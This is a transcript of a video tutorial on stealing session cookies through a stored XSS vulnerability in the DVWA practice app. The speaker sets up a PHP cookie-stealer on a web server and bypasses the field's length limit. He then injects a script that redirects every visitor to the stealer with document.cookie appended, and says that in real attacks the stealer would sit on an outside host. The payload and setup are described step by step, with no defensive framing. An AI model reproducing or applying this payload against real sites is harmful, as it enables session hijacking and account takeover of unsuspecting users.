Welcome back, everyone. Let me just log into the account. Just a second. Okay, I believe I typed the wrong password. Yep. Yeah. So in this video, I'll show you how you can use XSS to steal cookies. So basically, what we're going to do is, first of all, we need the root permissions. Okay. So get the root permissions, and we want to get a cookie stealing PHP file. So you can code your own if you want, but I will just show you an easy method. You can just go to Google, just search for COOKIESTEALER PHP script, and someone will just provide you the script if you don't know how to code PHP file. So just to save time, I'm just using the PHP script here. Here I am, and here you can see there are three versions available. The first one will save the cookies to a file that is known as cookiefile.txt. The second one is gonna email you the cookies right over here. You can just provide your email ID, and the third one is gonna store the information. I believe it's gonna store the information. Where is the file path? Yeah, it's gonna save the information in and this all information right out here. So it's gonna save all this information in a file. So I'll be using the first one for the sake of this tutorial. So I'm just copying this up. Okay, I want to open up the text editor. The leaf file will be fine. Just paste this up, and I feel that c.txt is a short name, so I'll just have the c.txt. I'll just click on save, and I'll just save this thing on desktop. So I'll just save it as uh, steal.php. Okay, I'm just naming it as steal.php, and I'm just gonna click on save. Here we have a PHP file, steal.php, and I'll just close this. And now we want to make a c.txt file, so I'll just go ahead and save a blank file in name of c.txt. Okay, where our cookies will get stored. And yeah, so on desktop. So here we have so here we have two files right out here. You can just see we have two files, and we want to move these files to a web hosting. Basically, so that you all can follow this thing, we'll be using the Kali localhost server because we are doing everything offline. We are using the VWL app, so we'll be doing everything offline. In real world scenario, you'll be uploading these two files on an online web hosting. Okay, when we'll be doing some live real examples, I might go ahead and do this type of thing in the real world as well. So we want to go to var, and you can just type in ls. You will just find out www. So cd www, and just press ls. You will find html, cd html, and just type in ls. You will find index.html, dvwa, and here I will go ahead and bring both of these files out here. So these are on desktop. What I can do is I can just go ahead and type in the mv command. So move. Then these files are on, I believe, they are on desktop, and actually they are on the Sagar's desktop, right? So I'll have to use the home. Yeah. So we have, just a second, we have home, then we have Sagar, then we have desktop. Okay, I believe I just press enter. So here we have the two files, which is the steal.php. Okay, or let me just do one thing. Let me clear the screen. This is a little bit messy. uh, Here we are. So desktop, and then we have the steal.php, and we want this file to be moved in uh, var www html, right? Just press enter. No state this thing, no such file directory. Okay, just a second. Yeah, so I just added a king sign which was wrong, right? So we have moved the home Sagar desktop and c.php to var www.html. Now I want to do same thing with the c.txt, so we'll just use the same command, just remove the c.php from here, right? It's the txt file, txt. Just press enter, just clear the screen, and I believe both of the files are there. So we want to clear the screen again, right? So now I want to start up the Apache and the server, our MySQL server. So service start Apache 2 and service start MySQL. Okay, just a second. Sorry. Service MySQL. Sorry, I did a syntax error again. This is start here. Start, right? Yeah. So here we go. We have just started up the servers, right? This is done. Now what I want to do is you can just close this up if you want. Now you want to go to localhost slash tvwa and just login up. Here we are, security. So we are again on the home and let's just go to the stored one. Okay, so basically we cannot go to the stored one. This is gonna redirect me again, so you can just see yes.com. Let me just reset the database because in the last video we just added some things out there and I believe database has been resetted, right? Yeah, so now we got to stored. Here you can see there is nothing, this is just a test message. And now what we're going to do is we're going to redirect the users. Okay, you can do this on reflected as well and on stored as well. So on stored, the thing will be that everyone who uses this site will get automatically redirected. On reflected, you already know that this person who will just click the link will get the XSS script run automatically. Now here I will just type in admin and in this message I will type in, I'll use the script tag again, script, then I'll just use the window dot location is equal to, okay, now you can just see in the last video as well we faced this problem. So there are two solutions. You can just go ahead and edit this thing and you can remove the maximum character length and the second one will be that you use the uh, you upload your script on another website and then you use the source tag in this like the body the b tag then src is equal to the path or the hosted script and that can work. So in this case I'm just going to use the first one. So you just right click here, okay, you just right click anywhere, you just click on inspect element and you want to click on this one right out here. So you want to find out this box. So this box is this one right here. You want to click on here and here's the message and here is the table and right here you can just see uh, the maximum and the minimum length is given right out here. So here you can edit this thing. So I'll just add it as 500 characters. Okay, I'll just press enter and that's all. I'll just close this up and now I can freely write anything if I want, right? So I can now add the script my script. So now the location will be window.location is equal to, and now I'll just add the location of the my hosted website. So in this case it is http localhost slash seal.php, right? But if you're working live, then this will be the website where your actual file is being hosted. Okay, so if I was using sagarbansal.com web hosting to host this seal.php, I'll use sagarbansal.com slash seal.php. Okay, so that's how it's just gonna work. Now what I'm gonna do is I'll add a question mark and cookie, okay, then a space and then plus escape. So this is the important part, and if you don't understand this thing, I mean, I'm pretty sure you don't know how to code JavaScript. So what you can do is, in this type of cases, if you don't understand this thing, so basically here you will have to put in document.cookie. Okay, so and now you will just close up the script. So, if you don't understand how this can be done and how you'll be able to type this type of things, what you can do in this cases is you can just go to Google. So I'm just gonna show you how you can just solve all of your problems. Okay, you can just type in uh, cookie stealing using XSS. I'll just show you a lot of tutorials, a lot of examples where you can just find out the code. So let me just open a one. Okay, that will open and we'll just see what type of code it has. So here you have a complete guide. Basically he's using some other things, I believe. So he's using, yeah, he's using another PHP code here. We have used another stealer. So here you can just see right out here he has used script language is called JavaScript and document.location. I'm using window.location, he's using document.location. Doesn't matter, but you can just see http yoursite.com slash whatever your PHP code. Okay, then you can just see the syntax here is question mark cookie is equal to, then it is closed, and then plus document dot cookie, and then document dot location, and this is a different syntax. And yeah, here is the syntax, I believe. Yeah, so this is the syntax which I am using. So here you can just see plus escape document dot cookie, and then he has just closed this up, and again there's a different syntax. So you can just use these scripts if you want. So definitely these are gonna work, and I'm using a different script here. So I believe I have done some mistake. Just a second. Why I have, okay, yeah, yep. So this should be right out here, I believe. Yeah, right. So you can even just go ahead and just copy this code, and you can just paste that code right out there. But uh, I'm just using my own code, so doesn't really matters. Okay, so let's try this up. And can you see this thing? We are redirected to localhost dash slash c.php, and then here you can just see cookie, and this is the cookie right out here. You can just see php session id and this thing, and this is the actual cookie which has been saved. So let's go back. Let's go to home. Now let's assume we are someone else. Okay, we just go ahead and we just open this site, and yeah, we automatically get redirected. So c.php is the file which is working now, and what you can do is you can even edit this c.php file. You can code this thing to anywhere where where your imagination can go. You can just use this file to redirect to the original site again, or you can use the site to go ahead and do something for you. I mean, it really depends what you want to do with this file. So yeah, that really depends upon you. So that is how you just steal cookies. And now to open your cookies, what you can do is it's really simple. We have the last command. What was this one? Yeah. So I'll using the leafpad, leafpad. You can use any of your editors. And now our cookies are being stored in c.txt. Okay, so it is not storing anything. Basically, I can just see that right out here. Let's just see why it is not storing anything. Okay, steel.php. Here we are. We have it is opening up the steel.php text file, and what are the permissions of in this case we just need to check out the permissions of the, I believe the permissions of, okay, what I'm doing, I just need to type in ls dash h, sorry, ll, okay, ll doesn't work in this one, ls dash h, yeah. So here we are, steel.php and txt. So I'll just use the chmod. 777 c.txt. Okay, so now it can be accessed by anyone, so that PHP can write into this file. I believe there is something wrong with that. So let's try again. We do it like this. Okay, now you can even open your file from here if you want. Localhost slash dv slash c.txt. Okay, so no cookies being displayed here, but I'm quite sure that it is storing up the cookies. Well, I'm not sure what's wrong going on here. You can just see cookies being gone there. But what you can do in this case is, let's just use the second one quarter. I have not coded that PHP script, so I cannot guarantee that is gonna work, because I have not coded that. Definitely, it may not work. But okay, I just grab that one, leaf pad. Uh, just a second. Yeah, this one, c.php. Here we are. Let's remove this all. Let's add this one, and here should be the file, text file, where it is. Just a second. Control find txt. Just find this for me. Yeah, so this is, I'll just add c.txt. Yeah, I believe everything is fine now. Let's try this one. This is, I have not coded them, so I cannot guarantee what's wrong gonna happen. So let's try this now. So here we are. We go to store. Something happens. C.php cookie is going out, and is this gonna work now? Okay, I added a full stop. Yeah, so here you can just see right out here, now this is working. So maybe the first one, the first cookie was, the stealer was not working. This cookie stealer is working. This is, I have not coded them. If you want, you can code your own. It's a simple PHP. Right out here you can just add a variable of cookie, and that will grab the cookie. So it's a simple variable. Here you can just see in this dealer we have got the IP address, which is one only. So because you are on localhost, this is the port here, host agent, which was being used, and here method was referenced, which was uh, the cookie came from this reference, and the cookie is this right out here. So you can just see that. Now this is how you grab cookies using XSS vulnerability. So you just redirect someone to anywhere. So this is the code which you want to use. Script window allocation, and then the URL of the cookie stealer, and then question mark cookie, and then plus escape. So you want to escape the sentence, and there document dot cookie, and then script tag close. That is what you want to do. And that is how you just work with the cookie stealers in cookie steal with XSS. So I'll see you in the next video. Thank you for watching.